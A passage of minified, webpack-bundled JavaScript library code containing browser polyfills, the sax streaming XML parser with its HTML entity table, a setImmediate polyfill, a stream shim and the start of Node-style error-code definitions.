supported")},g.cwd=function(){return"/"},g.chdir=function(K){throw new Error("process.chdir is not supported")},g.umask=function(){return 0}},9509:(Q,F,E)=>{var g=E(8764),b=g.Buffer;function _(M,p){for(var D in M)p[D]=M[D]}function y(M,p,D){return b(M,p,D)}b.from&&b.alloc&&b.allocUnsafe&&b.allocUnsafeSlow?Q.exports=g:(_(g,F),F.Buffer=y),_(b,y),y.from=function(M,p,D){if("number"==typeof M)throw new TypeError("Argument must not be a number");return b(M,p,D)},y.alloc=function(M,p,D){if("number"!=typeof M)throw new TypeError("Argument must be a number");var w=b(M);return void 0!==p?"string"==typeof D?w.fill(p,D):w.fill(p):w.fill(0),w},y.allocUnsafe=function(M){if("number"!=typeof M)throw new TypeError("Argument must be a number");return b(M)},y.allocUnsafeSlow=function(M){if("number"!=typeof M)throw new TypeError("Argument must be a number");return g.SlowBuffer(M)}},6099:(Q,F,E)=>{!function(g){g.parser=function(qe,De){return new y(qe,De)},g.SAXParser=y,g.SAXStream=p,g.createStream=function(qe,De){return new p(qe,De)},g.MAX_BUFFER_LENGTH=65536;var b,_=["comment","sgmlDecl","textNode","tagName","doctype","procInstName","procInstBody","entity","attribName","attribValue","cdata","script"];function y(qe,De){if(!(this instanceof y))return new y(qe,De);var Ve=this;(function(ze){for(var me=0,Ke=_.length;me<Ke;me++)ze[_[me]]=""})(Ve),Ve.q=Ve.c="",Ve.bufferCheckPosition=g.MAX_BUFFER_LENGTH,Ve.opt=De||{},Ve.opt.lowercase=Ve.opt.lowercase||Ve.opt.lowercasetags,Ve.looseCase=Ve.opt.lowercase?"toLowerCase":"toUpperCase",Ve.tags=[],Ve.closed=Ve.closedRoot=Ve.sawRoot=!1,Ve.tag=Ve.error=null,Ve.strict=!!qe,Ve.noscript=!(!qe&&!Ve.opt.noscript),Ve.state=A.BEGIN,Ve.strictEntities=Ve.opt.strictEntities,Ve.ENTITIES=Object.create(Ve.strictEntities?g.XML_ENTITIES:g.ENTITIES),Ve.attribList=[],Ve.opt.xmlns&&(Ve.ns=Object.create(x)),Ve.trackPosition=!1!==Ve.opt.position,Ve.trackPosition&&(Ve.position=Ve.line=Ve.column=0),P(Ve,"onready")}g.EVENTS=["text","processinginstruction","sgmldeclaration","doctype","comment","opentagstart","attribute","opentag","closetag","opencdata","cdata","closecdata","error","end","ready","script","opennamespace","closenamespace"],Object.create||(Object.create=function(qe){function De(){}return De.prototype=qe,new De}),Object.keys||(Object.keys=function(qe){var De=[];for(var Ve in qe)qe.hasOwnProperty(Ve)&&De.push(Ve);return De}),y.prototype={end:function(){R(this)},write:function(qe){var De=this;if(this.error)throw this.error;if(De.closed)return h(De,"Cannot write after close. Assign an onready handler.");if(null===qe)return R(De);"object"==typeof qe&&(qe=qe.toString());for(var Ve=0,ze="";ze=Be(qe,Ve++),De.c=ze,ze;)switch(De.trackPosition&&(De.position++,"\n"===ze?(De.line++,De.column=0):De.column++),De.state){case A.BEGIN:if(De.state=A.BEGIN_WHITESPACE,"\ufeff"===ze)continue;He(De,ze);continue;case A.BEGIN_WHITESPACE:He(De,ze);continue;case A.TEXT:if(De.sawRoot&&!De.closedRoot){for(var me=Ve-1;ze&&"<"!==ze&&"&"!==ze;)(ze=Be(qe,Ve++))&&De.trackPosition&&(De.position++,"\n"===ze?(De.line++,De.column=0):De.column++);De.textNode+=qe.substring(me,Ve-1)}"<"!==ze||De.sawRoot&&De.closedRoot&&!De.strict?(ee(ze)||De.sawRoot&&!De.closedRoot||J(De,"Text data outside of root node."),"&"===ze?De.state=A.TEXT_ENTITY:De.textNode+=ze):(De.state=A.OPEN_WAKA,De.startTagPosition=De.position);continue;case A.SCRIPT:"<"===ze?De.state=A.SCRIPT_ENDING:De.script+=ze;continue;case A.SCRIPT_ENDING:"/"===ze?De.state=A.CLOSE_TAG:(De.script+="<"+ze,De.state=A.SCRIPT);continue;case A.OPEN_WAKA:"!"===ze?(De.state=A.SGML_DECL,De.sgmlDecl=""):ee(ze)||(le(S,ze)?(De.state=A.OPEN_TAG,De.tagName=ze):"/"===ze?(De.state=A.CLOSE_TAG,De.tagName=""):"?"===ze?(De.state=A.PROC_INST,De.procInstName=De.procInstBody=""):(J(De,"Unencoded <"),De.startTagPosition+1<De.position&&(ze=new Array(De.position-De.startTagPosition).join(" ")+ze),De.textNode+="<"+ze,De.state=A.TEXT));continue;case A.SGML_DECL:"[CDATA["===(De.sgmlDecl+ze).toUpperCase()?(G(De,"onopencdata"),De.state=A.CDATA,De.sgmlDecl="",De.cdata=""):De.sgmlDecl+ze==="--"?(De.state=A.COMMENT,De.comment="",De.sgmlDecl=""):"DOCTYPE"===(De.sgmlDecl+ze).toUpperCase()?(De.state=A.DOCTYPE,(De.doctype||De.sawRoot)&&J(De,"Inappropriately located doctype declaration"),De.doctype="",De.sgmlDecl=""):">"===ze?(G(De,"onsgmldeclaration",De.sgmlDecl),De.sgmlDecl="",De.state=A.TEXT):(se(ze)&&(De.state=A.SGML_DECL_QUOTED),De.sgmlDecl+=ze);continue;case A.SGML_DECL_QUOTED:ze===De.q&&(De.state=A.SGML_DECL,De.q=""),De.sgmlDecl+=ze;continue;case A.DOCTYPE:">"===ze?(De.state=A.TEXT,G(De,"ondoctype",De.doctype),De.doctype=!0):(De.doctype+=ze,"["===ze?De.state=A.DOCTYPE_DTD:se(ze)&&(De.state=A.DOCTYPE_QUOTED,De.q=ze));continue;case A.DOCTYPE_QUOTED:De.doctype+=ze,ze===De.q&&(De.q="",De.state=A.DOCTYPE);continue;case A.DOCTYPE_DTD:De.doctype+=ze,"]"===ze?De.state=A.DOCTYPE:se(ze)&&(De.state=A.DOCTYPE_DTD_QUOTED,De.q=ze);continue;case A.DOCTYPE_DTD_QUOTED:De.doctype+=ze,ze===De.q&&(De.state=A.DOCTYPE_DTD,De.q="");continue;case A.COMMENT:"-"===ze?De.state=A.COMMENT_ENDING:De.comment+=ze;continue;case A.COMMENT_ENDING:"-"===ze?(De.state=A.COMMENT_ENDED,De.comment=L(De.opt,De.comment),De.comment&&G(De,"oncomment",De.comment),De.comment=""):(De.comment+="-"+ze,De.state=A.COMMENT);continue;case A.COMMENT_ENDED:">"!==ze?(J(De,"Malformed comment"),De.comment+="--"+ze,De.state=A.COMMENT):De.state=A.TEXT;continue;case A.CDATA:"]"===ze?De.state=A.CDATA_ENDING:De.cdata+=ze;continue;case A.CDATA_ENDING:"]"===ze?De.state=A.CDATA_ENDING_2:(De.cdata+="]"+ze,De.state=A.CDATA);continue;case A.CDATA_ENDING_2:">"===ze?(De.cdata&&G(De,"oncdata",De.cdata),G(De,"onclosecdata"),De.cdata="",De.state=A.TEXT):"]"===ze?De.cdata+="]":(De.cdata+="]]"+ze,De.state=A.CDATA);continue;case A.PROC_INST:"?"===ze?De.state=A.PROC_INST_ENDING:ee(ze)?De.state=A.PROC_INST_BODY:De.procInstName+=ze;continue;case A.PROC_INST_BODY:if(!De.procInstBody&&ee(ze))continue;"?"===ze?De.state=A.PROC_INST_ENDING:De.procInstBody+=ze;continue;case A.PROC_INST_ENDING:">"===ze?(G(De,"onprocessinginstruction",{name:De.procInstName,body:De.procInstBody}),De.procInstName=De.procInstBody="",De.state=A.TEXT):(De.procInstBody+="?"+ze,De.state=A.PROC_INST_BODY);continue;case A.OPEN_TAG:le(O,ze)?De.tagName+=ze:(Z(De),">"===ze?Ae(De):"/"===ze?De.state=A.OPEN_TAG_SLASH:(ee(ze)||J(De,"Invalid character in tag name"),De.state=A.ATTRIB));continue;case A.OPEN_TAG_SLASH:">"===ze?(Ae(De,!0),Ue(De)):(J(De,"Forward-slash in opening tag not followed by >"),De.state=A.ATTRIB);continue;case A.ATTRIB:if(ee(ze))continue;">"===ze?Ae(De):"/"===ze?De.state=A.OPEN_TAG_SLASH:le(S,ze)?(De.attribName=ze,De.attribValue="",De.state=A.ATTRIB_NAME):J(De,"Invalid attribute name");continue;case A.ATTRIB_NAME:"="===ze?De.state=A.ATTRIB_VALUE:">"===ze?(J(De,"Attribute without value"),De.attribValue=De.attribName,Ie(De),Ae(De)):ee(ze)?De.state=A.ATTRIB_NAME_SAW_WHITE:le(O,ze)?De.attribName+=ze:J(De,"Invalid attribute name");continue;case A.ATTRIB_NAME_SAW_WHITE:if("="===ze)De.state=A.ATTRIB_VALUE;else{if(ee(ze))continue;J(De,"Attribute without value"),De.tag.attributes[De.attribName]="",De.attribValue="",G(De,"onattribute",{name:De.attribName,value:""}),De.attribName="",">"===ze?Ae(De):le(S,ze)?(De.attribName=ze,De.state=A.ATTRIB_NAME):(J(De,"Invalid attribute name"),De.state=A.ATTRIB)}continue;case A.ATTRIB_VALUE:if(ee(ze))continue;se(ze)?(De.q=ze,De.state=A.ATTRIB_VALUE_QUOTED):(J(De,"Unquoted attribute value"),De.state=A.ATTRIB_VALUE_UNQUOTED,De.attribValue=ze);continue;case A.ATTRIB_VALUE_QUOTED:if(ze!==De.q){"&"===ze?De.state=A.ATTRIB_VALUE_ENTITY_Q:De.attribValue+=ze;continue}Ie(De),De.q="",De.state=A.ATTRIB_VALUE_CLOSED;continue;case A.ATTRIB_VALUE_CLOSED:ee(ze)?De.state=A.ATTRIB:">"===ze?Ae(De):"/"===ze?De.state=A.OPEN_TAG_SLASH:le(S,ze)?(J(De,"No whitespace between attributes"),De.attribName=ze,De.attribValue="",De.state=A.ATTRIB_NAME):J(De,"Invalid attribute name");continue;case A.ATTRIB_VALUE_UNQUOTED:if(!ve(ze)){"&"===ze?De.state=A.ATTRIB_VALUE_ENTITY_U:De.attribValue+=ze;continue}Ie(De),">"===ze?Ae(De):De.state=A.ATTRIB;continue;case A.CLOSE_TAG:if(De.tagName)">"===ze?Ue(De):le(O,ze)?De.tagName+=ze:De.script?(De.script+="</"+De.tagName,De.tagName="",De.state=A.SCRIPT):(ee(ze)||J(De,"Invalid tagname in closing tag"),De.state=A.CLOSE_TAG_SAW_WHITE);else{if(ee(ze))continue;ye(S,ze)?De.script?(De.script+="</"+ze,De.state=A.SCRIPT):J(De,"Invalid tagname in closing tag."):De.tagName=ze}continue;case A.CLOSE_TAG_SAW_WHITE:if(ee(ze))continue;">"===ze?Ue(De):J(De,"Invalid characters in closing tag");continue;case A.TEXT_ENTITY:case A.ATTRIB_VALUE_ENTITY_Q:case A.ATTRIB_VALUE_ENTITY_U:var rt,Ge;switch(De.state){case A.TEXT_ENTITY:rt=A.TEXT,Ge="textNode";break;case A.ATTRIB_VALUE_ENTITY_Q:rt=A.ATTRIB_VALUE_QUOTED,Ge="attribValue";break;case A.ATTRIB_VALUE_ENTITY_U:rt=A.ATTRIB_VALUE_UNQUOTED,Ge="attribValue"}";"===ze?(De[Ge]+=Xe(De),De.entity="",De.state=rt):le(De.entity.length?K:U,ze)?De.entity+=ze:(J(De,"Invalid character in entity name"),De[Ge]+="&"+De.entity+ze,De.entity="",De.state=rt);continue;default:throw new Error(De,"Unknown state: "+De.state)}return De.position>=De.bufferCheckPosition&&function(Qe){for(var ht=Math.max(g.MAX_BUFFER_LENGTH,10),mt=0,lt=0,ft=_.length;lt<ft;lt++){var xe=Qe[_[lt]].length;if(xe>ht)switch(_[lt]){case"textNode":X(Qe);break;case"cdata":G(Qe,"oncdata",Qe.cdata),Qe.cdata="";break;case"script":G(Qe,"onscript",Qe.script),Qe.script="";break;default:h(Qe,"Max buffer length exceeded: "+_[lt])}mt=Math.max(mt,xe)}Qe.bufferCheckPosition=g.MAX_BUFFER_LENGTH-mt+Qe.position}(De),De},resume:function(){return this.error=null,this},close:function(){return this.write(null)},flush:function(){var qe;X(qe=this),""!==qe.cdata&&(G(qe,"oncdata",qe.cdata),qe.cdata=""),""!==qe.script&&(G(qe,"onscript",qe.script),qe.script="")}};try{b=E(2830).Stream}catch(qe){b=function(){}}var M=g.EVENTS.filter(function(qe){return"error"!==qe&&"end"!==qe});function p(qe,De){if(!(this instanceof p))return new p(qe,De);b.apply(this),this._parser=new y(qe,De),this.writable=!0,this.readable=!0;var Ve=this;this._parser.onend=function(){Ve.emit("end")},this._parser.onerror=function(ze){Ve.emit("error",ze),Ve._parser.error=null},this._decoder=null,M.forEach(function(ze){Object.defineProperty(Ve,"on"+ze,{get:function(){return Ve._parser["on"+ze]},set:function(me){if(!me)return Ve.removeAllListeners(ze),Ve._parser["on"+ze]=me,me;Ve.on(ze,me)},enumerable:!0,configurable:!1})})}(p.prototype=Object.create(b.prototype,{constructor:{value:p}})).write=function(qe){if("function"==typeof ie&&"function"==typeof ie.isBuffer&&ie.isBuffer(qe)){if(!this._decoder){var De=E(2553).s;this._decoder=new De("utf8")}qe=this._decoder.write(qe)}return this._parser.write(qe.toString()),this.emit("data",qe),!0},p.prototype.end=function(qe){return qe&&qe.length&&this.write(qe),this._parser.end(),!0},p.prototype.on=function(qe,De){var Ve=this;return Ve._parser["on"+qe]||-1===M.indexOf(qe)||(Ve._parser["on"+qe]=function(){var ze=1===arguments.length?[arguments[0]]:Array.apply(null,arguments);ze.splice(0,0,qe),Ve.emit.apply(Ve,ze)}),b.prototype.on.call(Ve,qe,De)};var D="http://www.w3.org/XML/1998/namespace",w="http://www.w3.org/2000/xmlns/",x={xml:D,xmlns:w},S=/[:_A-Za-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD]/,O=/[:_A-Za-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD\u00B7\u0300-\u036F\u203F-\u2040.\d-]/,U=/[#:_A-Za-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD]/,K=/[#:_A-Za-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD\u00B7\u0300-\u036F\u203F-\u2040.\d-]/;function ee(qe){return" "===qe||"\n"===qe||"\r"===qe||"\t"===qe}function se(qe){return'"'===qe||"'"===qe}function ve(qe){return">"===qe||ee(qe)}function le(qe,De){return qe.test(De)}function ye(qe,De){return!le(qe,De)}var z,l,f,A=0;for(var v in g.STATE={BEGIN:A++,BEGIN_WHITESPACE:A++,TEXT:A++,TEXT_ENTITY:A++,OPEN_WAKA:A++,SGML_DECL:A++,SGML_DECL_QUOTED:A++,DOCTYPE:A++,DOCTYPE_QUOTED:A++,DOCTYPE_DTD:A++,DOCTYPE_DTD_QUOTED:A++,COMMENT_STARTING:A++,COMMENT:A++,COMMENT_ENDING:A++,COMMENT_ENDED:A++,CDATA:A++,CDATA_ENDING:A++,CDATA_ENDING_2:A++,PROC_INST:A++,PROC_INST_BODY:A++,PROC_INST_ENDING:A++,OPEN_TAG:A++,OPEN_TAG_SLASH:A++,ATTRIB:A++,ATTRIB_NAME:A++,ATTRIB_NAME_SAW_WHITE:A++,ATTRIB_VALUE:A++,ATTRIB_VALUE_QUOTED:A++,ATTRIB_VALUE_CLOSED:A++,ATTRIB_VALUE_UNQUOTED:A++,ATTRIB_VALUE_ENTITY_Q:A++,ATTRIB_VALUE_ENTITY_U:A++,CLOSE_TAG:A++,CLOSE_TAG_SAW_WHITE:A++,SCRIPT:A++,SCRIPT_ENDING:A++},g.XML_ENTITIES={amp:"&",gt:">",lt:"<",quot:'"',apos:"'"},g.ENTITIES={amp:"&",gt:">",lt:"<",quot:'"',apos:"'",AElig:198,Aacute:193,Acirc:194,Agrave:192,Aring:197,Atilde:195,Auml:196,Ccedil:199,ETH:208,Eacute:201,Ecirc:202,Egrave:200,Euml:203,Iacute:205,Icirc:206,Igrave:204,Iuml:207,Ntilde:209,Oacute:211,Ocirc:212,Ograve:210,Oslash:216,Otilde:213,Ouml:214,THORN:222,Uacute:218,Ucirc:219,Ugrave:217,Uuml:220,Yacute:221,aacute:225,acirc:226,aelig:230,agrave:224,aring:229,atilde:227,auml:228,ccedil:231,eacute:233,ecirc:234,egrave:232,eth:240,euml:235,iacute:237,icirc:238,igrave:236,iuml:239,ntilde:241,oacute:243,ocirc:244,ograve:242,oslash:248,otilde:245,ouml:246,szlig:223,thorn:254,uacute:250,ucirc:251,ugrave:249,uuml:252,yacute:253,yuml:255,copy:169,reg:174,nbsp:160,iexcl:161,cent:162,pound:163,curren:164,yen:165,brvbar:166,sect:167,uml:168,ordf:170,laquo:171,not:172,shy:173,macr:175,deg:176,plusmn:177,sup1:185,sup2:178,sup3:179,acute:180,micro:181,para:182,middot:183,cedil:184,ordm:186,raquo:187,frac14:188,frac12:189,frac34:190,iquest:191,times:215,divide:247,OElig:338,oelig:339,Scaron:352,scaron:353,Yuml:376,fnof:402,circ:710,tilde:732,Alpha:913,Beta:914,Gamma:915,Delta:916,Epsilon:917,Zeta:918,Eta:919,Theta:920,Iota:921,Kappa:922,Lambda:923,Mu:924,Nu:925,Xi:926,Omicron:927,Pi:928,Rho:929,Sigma:931,Tau:932,Upsilon:933,Phi:934,Chi:935,Psi:936,Omega:937,alpha:945,beta:946,gamma:947,delta:948,epsilon:949,zeta:950,eta:951,theta:952,iota:953,kappa:954,lambda:955,mu:956,nu:957,xi:958,omicron:959,pi:960,rho:961,sigmaf:962,sigma:963,tau:964,upsilon:965,phi:966,chi:967,psi:968,omega:969,thetasym:977,upsih:978,piv:982,ensp:8194,emsp:8195,thinsp:8201,zwnj:8204,zwj:8205,lrm:8206,rlm:8207,ndash:8211,mdash:8212,lsquo:8216,rsquo:8217,sbquo:8218,ldquo:8220,rdquo:8221,bdquo:8222,dagger:8224,Dagger:8225,bull:8226,hellip:8230,permil:8240,prime:8242,Prime:8243,lsaquo:8249,rsaquo:8250,oline:8254,frasl:8260,euro:8364,image:8465,weierp:8472,real:8476,trade:8482,alefsym:8501,larr:8592,uarr:8593,rarr:8594,darr:8595,harr:8596,crarr:8629,lArr:8656,uArr:8657,rArr:8658,dArr:8659,hArr:8660,forall:8704,part:8706,exist:8707,empty:8709,nabla:8711,isin:8712,notin:8713,ni:8715,prod:8719,sum:8721,minus:8722,lowast:8727,radic:8730,prop:8733,infin:8734,ang:8736,and:8743,or:8744,cap:8745,cup:8746,int:8747,there4:8756,sim:8764,cong:8773,asymp:8776,ne:8800,equiv:8801,le:8804,ge:8805,sub:8834,sup:8835,nsub:8836,sube:8838,supe:8839,oplus:8853,otimes:8855,perp:8869,sdot:8901,lceil:8968,rceil:8969,lfloor:8970,rfloor:8971,lang:9001,rang:9002,loz:9674,spades:9824,clubs:9827,hearts:9829,diams:9830},Object.keys(g.ENTITIES).forEach(function(qe){var De=g.ENTITIES[qe],Ve="number"==typeof De?String.fromCharCode(De):De;g.ENTITIES[qe]=Ve}),g.STATE)g.STATE[g.STATE[v]]=v;function P(qe,De,Ve){qe[De]&&qe[De](Ve)}function G(qe,De,Ve){qe.textNode&&X(qe),P(qe,De,Ve)}function X(qe){qe.textNode=L(qe.opt,qe.textNode),qe.textNode&&P(qe,"ontext",qe.textNode),qe.textNode=""}function L(qe,De){return qe.trim&&(De=De.trim()),qe.normalize&&(De=De.replace(/\s+/g," ")),De}function h(qe,De){return X(qe),qe.trackPosition&&(De+="\nLine: "+qe.line+"\nColumn: "+qe.column+"\nChar: "+qe.c),De=new Error(De),qe.error=De,P(qe,"onerror",De),qe}function R(qe){return qe.sawRoot&&!qe.closedRoot&&J(qe,"Unclosed root tag"),qe.state!==A.BEGIN&&qe.state!==A.BEGIN_WHITESPACE&&qe.state!==A.TEXT&&h(qe,"Unexpected end"),X(qe),qe.c="",qe.closed=!0,P(qe,"onend"),y.call(qe,qe.strict,qe.opt),qe}function J(qe,De){if("object"!=typeof qe||!(qe instanceof y))throw new Error("bad call to strictFail");qe.strict&&h(qe,De)}function Z(qe){qe.strict||(qe.tagName=qe.tagName[qe.looseCase]());var De=qe.tags[qe.tags.length-1]||qe,Ve=qe.tag={name:qe.tagName,attributes:{}};qe.opt.xmlns&&(Ve.ns=De.ns),qe.attribList.length=0,G(qe,"onopentagstart",Ve)}function ue(qe,De){var Ve=qe.indexOf(":")<0?["",qe]:qe.split(":"),ze=Ve[0],me=Ve[1];return De&&"xmlns"===qe&&(ze="xmlns",me=""),{prefix:ze,local:me}}function Ie(qe){if(qe.strict||(qe.attribName=qe.attribName[qe.looseCase]()),-1!==qe.attribList.indexOf(qe.attribName)||qe.tag.attributes.hasOwnProperty(qe.attribName))qe.attribName=qe.attribValue="";else{if(qe.opt.xmlns){var De=ue(qe.attribName,!0),ze=De.local;if("xmlns"===De.prefix)if("xml"===ze&&qe.attribValue!==D)J(qe,"xml: prefix must be bound to "+D+"\nActual: "+qe.attribValue);else if("xmlns"===ze&&qe.attribValue!==w)J(qe,"xmlns: prefix must be bound to "+w+"\nActual: "+qe.attribValue);else{var me=qe.tag,Ke=qe.tags[qe.tags.length-1]||qe;me.ns===Ke.ns&&(me.ns=Object.create(Ke.ns)),me.ns[ze]=qe.attribValue}qe.attribList.push([qe.attribName,qe.attribValue])}else qe.tag.attributes[qe.attribName]=qe.attribValue,G(qe,"onattribute",{name:qe.attribName,value:qe.attribValue});qe.attribName=qe.attribValue=""}}function Ae(qe,De){if(qe.opt.xmlns){var Ve=qe.tag,ze=ue(qe.tagName);Ve.prefix=ze.prefix,Ve.local=ze.local,Ve.uri=Ve.ns[ze.prefix]||"",Ve.prefix&&!Ve.uri&&(J(qe,"Unbound namespace prefix: "+JSON.stringify(qe.tagName)),Ve.uri=ze.prefix),Ve.ns&&(qe.tags[qe.tags.length-1]||qe).ns!==Ve.ns&&Object.keys(Ve.ns).forEach(function(Je){G(qe,"onopennamespace",{prefix:Je,uri:Ve.ns[Je]})});for(var Ke=0,rt=qe.attribList.length;Ke<rt;Ke++){var Ge=qe.attribList[Ke],Qe=Ge[0],ht=Ge[1],mt=ue(Qe,!0),lt=mt.prefix,xe=""===lt?"":Ve.ns[lt]||"",We={name:Qe,value:ht,prefix:lt,local:mt.local,uri:xe};lt&&"xmlns"!==lt&&!xe&&(J(qe,"Unbound namespace prefix: "+JSON.stringify(lt)),We.uri=lt),qe.tag.attributes[Qe]=We,G(qe,"onattribute",We)}qe.attribList.length=0}qe.tag.isSelfClosing=!!De,qe.sawRoot=!0,qe.tags.push(qe.tag),G(qe,"onopentag",qe.tag),De||(qe.state=qe.noscript||"script"!==qe.tagName.toLowerCase()?A.TEXT:A.SCRIPT,qe.tag=null,qe.tagName=""),qe.attribName=qe.attribValue="",qe.attribList.length=0}function Ue(qe){if(!qe.tagName)return J(qe,"Weird empty close tag."),qe.textNode+="</>",void(qe.state=A.TEXT);if(qe.script){if("script"!==qe.tagName)return qe.script+="</"+qe.tagName+">",qe.tagName="",void(qe.state=A.SCRIPT);G(qe,"onscript",qe.script),qe.script=""}var De=qe.tags.length,Ve=qe.tagName;qe.strict||(Ve=Ve[qe.looseCase]());for(var ze=Ve;De--&&qe.tags[De].name!==ze;)J(qe,"Unexpected close tag");if(De<0)return J(qe,"Unmatched closing tag: "+qe.tagName),qe.textNode+="</"+qe.tagName+">",void(qe.state=A.TEXT);qe.tagName=Ve;for(var me=qe.tags.length;me-- >De;){var Ke=qe.tag=qe.tags.pop();qe.tagName=qe.tag.name,G(qe,"onclosetag",qe.tagName);var rt={};for(var Ge in Ke.ns)rt[Ge]=Ke.ns[Ge];qe.opt.xmlns&&Ke.ns!==(qe.tags[qe.tags.length-1]||qe).ns&&Object.keys(Ke.ns).forEach(function(ht){G(qe,"onclosenamespace",{prefix:ht,uri:Ke.ns[ht]})})}0===De&&(qe.closedRoot=!0),qe.tagName=qe.attribValue=qe.attribName="",qe.attribList.length=0,qe.state=A.TEXT}function Xe(qe){var De,Ve=qe.entity,ze=Ve.toLowerCase(),me="";return qe.ENTITIES[Ve]?qe.ENTITIES[Ve]:qe.ENTITIES[ze]?qe.ENTITIES[ze]:("#"===(Ve=ze).charAt(0)&&("x"===Ve.charAt(1)?(Ve=Ve.slice(2),me=(De=parseInt(Ve,16)).toString(16)):(Ve=Ve.slice(1),me=(De=parseInt(Ve,10)).toString(10))),Ve=Ve.replace(/^0+/,""),isNaN(De)||me.toLowerCase()!==Ve?(J(qe,"Invalid character entity"),"&"+qe.entity+";"):String.fromCodePoint(De))}function He(qe,De){"<"===De?(qe.state=A.OPEN_WAKA,qe.startTagPosition=qe.position):ee(De)||(J(qe,"Non-whitespace before first tag."),qe.textNode=De,qe.state=A.TEXT)}function Be(qe,De){var Ve="";return De<qe.length&&(Ve=qe.charAt(De)),Ve}A=g.STATE,String.fromCodePoint||(z=String.fromCharCode,l=Math.floor,f=function(){var qe,Ve=16384,ze=[],me=-1,Ke=arguments.length;if(!Ke)return"";for(var rt="";++me<Ke;){var Ge=Number(arguments[me]);if(!isFinite(Ge)||Ge<0||Ge>1114111||l(Ge)!==Ge)throw RangeError("Invalid code point: "+Ge);Ge<=65535?ze.push(Ge):(qe=55296+((Ge-=65536)>>10),ze.push(qe,Ge%1024+56320)),(me+1===Ke||ze.length>Ve)&&(rt+=z.apply(null,ze),ze.length=0)}return rt},Object.defineProperty?Object.defineProperty(String,"fromCodePoint",{value:f,configurable:!0,writable:!0}):String.fromCodePoint=f)}(F)},4889:function(Q,F,E){var g=E(4155);!function(b,_){"use strict";if(!b.setImmediate){var y,M,p,D,w,x=1,S={},O=!1,U=b.document,K=Object.getPrototypeOf&&Object.getPrototypeOf(b);K=K&&K.setTimeout?K:b,"[object process]"==={}.toString.call(b.process)?y=function(ve){g.nextTick(function(){se(ve)})}:function(){if(b.postMessage&&!b.importScripts){var ve=!0,le=b.onmessage;return b.onmessage=function(){ve=!1},b.postMessage("","*"),b.onmessage=le,ve}}()?(D="setImmediate$"+Math.random()+"$",w=function(ve){ve.source===b&&"string"==typeof ve.data&&0===ve.data.indexOf(D)&&se(+ve.data.slice(D.length))},b.addEventListener?b.addEventListener("message",w,!1):b.attachEvent("onmessage",w),y=function(ve){b.postMessage(D+ve,"*")}):b.MessageChannel?((p=new MessageChannel).port1.onmessage=function(ve){se(ve.data)},y=function(ve){p.port2.postMessage(ve)}):U&&"onreadystatechange"in U.createElement("script")?(M=U.documentElement,y=function(ve){var le=U.createElement("script");le.onreadystatechange=function(){se(ve),le.onreadystatechange=null,M.removeChild(le),le=null},M.appendChild(le)}):y=function(ve){setTimeout(se,0,ve)},K.setImmediate=function(ve){"function"!=typeof ve&&(ve=new Function(""+ve));for(var le=new Array(arguments.length-1),ye=0;ye<le.length;ye++)le[ye]=arguments[ye+1];var z={callback:ve,args:le};return S[x]=z,y(x),x++},K.clearImmediate=ee}function ee(ve){delete S[ve]}function se(ve){if(O)setTimeout(se,0,ve);else{var le=S[ve];if(le){O=!0;try{!function(ye){var z=ye.callback,l=ye.args;switch(l.length){case 0:z();break;case 1:z(l[0]);break;case 2:z(l[0],l[1]);break;case 3:z(l[0],l[1],l[2]);break;default:z.apply(void 0,l)}}(le)}finally{ee(ve),O=!1}}}}}("undefined"==typeof self?void 0===E.g?this:E.g:self)},2830:(Q,F,E)=>{Q.exports=b;var g=E(7187).EventEmitter;function b(){g.call(this)}E(5717)(b,g),b.Readable=E(6577),b.Writable=E(323),b.Duplex=E(8656),b.Transform=E(4473),b.PassThrough=E(2366),b.finished=E(1086),b.pipeline=E(6472),b.Stream=b,b.prototype.pipe=function(_,y){var M=this;function p(K){_.writable&&!1===_.write(K)&&M.pause&&M.pause()}function D(){M.readable&&M.resume&&M.resume()}M.on("data",p),_.on("drain",D),_._isStdio||y&&!1===y.end||(M.on("end",x),M.on("close",S));var w=!1;function x(){w||(w=!0,_.end())}function S(){w||(w=!0,"function"==typeof _.destroy&&_.destroy())}function O(K){if(U(),0===g.listenerCount(this,"error"))throw K}function U(){M.removeListener("data",p),_.removeListener("drain",D),M.removeListener("end",x),M.removeListener("close",S),M.removeListener("error",O),_.removeListener("error",O),M.removeListener("end",U),M.removeListener("close",U),_.removeListener("close",U)}return M.on("error",O),_.on("error",O),M.on("end",U),M.on("close",U),_.on("close",U),_.emit("pipe",M),_}},8106:Q=>{"use strict";var F={};function E(b,_,y){y||(y=Error);var M=function(p){var D,w;function x(S,O,U){return p.call(this,"string"==typeof _?_:_(S,O,U))||this}return w=p,(D=x).prototype=Object.create(w.prototype),D.prototype.constructor=D,D.__proto__=w,x}(y);M.prototype.name=y.name,M.prototype.code=b,F[b]=M}function g(b,_){if(Array.isArray(b)){var y=b.length;return b=b.map(function(M){return String(M)}),y>2?"one of ".concat(_," ").concat(b.slice(0,y-1).join(", "),", or ")+b[y-1]:2===y?"one of ".concat(_," ").concat(b[0]," or ").concat(b[1]):"of ".concat(_," ").concat(b[0])}return"of ".concat(_," ").concat(String(b))}E("ERR_INVALID_OPT_VALUE",function(b,_){return'The value "'+_+'" is invalid for option "'+b+'"'},TypeError),E("ERR_INVALID_ARG_TYPE",function(b,_,y){var M,D,w,x,O,K;if("string"==typeof _&&"not "===_.substr(0,"not ".length)?(M="must not be",_=_.replace(/^not /,"")):M="must be",O=b,(void 0===K||K>O.length)&&(K=O.length)," argument"===O.substring(K-" argument".length,K))D="The ".concat(b," ").concat(M," ").concat(g(_,"type"));else{var S=("number"!=typeof x&&(x=0),x+1>(w=b).length||-1===w.indexOf(".",x)?"argument":"property");D='The "'.concat(b,'" ').concat(S," ").concat(M," ").concat(g(_,"type"))}return D+". Received type ".concat(typeof 